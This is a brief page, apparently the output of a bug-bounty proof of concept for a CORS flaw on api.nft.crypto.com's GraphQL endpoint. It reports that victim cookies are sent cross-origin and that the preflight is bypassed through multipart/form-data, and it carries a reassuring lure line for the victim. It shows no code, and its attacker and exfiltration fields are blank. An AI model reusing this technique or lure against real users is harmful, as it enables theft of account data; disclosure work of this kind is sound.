No wallet connection required. We use your existing Crypto.com session.
PROOF OF EXPLOITATION — CORS BUG
Data exfiltrated cross-origin from api.nft.crypto.com
Attacker origin: Target:https://api.nft.crypto.com/graphql credentials:include: yes (victim cookies sent) CORS preflight: bypassed (multipart/form-data is CORS-simple) Exfiltrated to: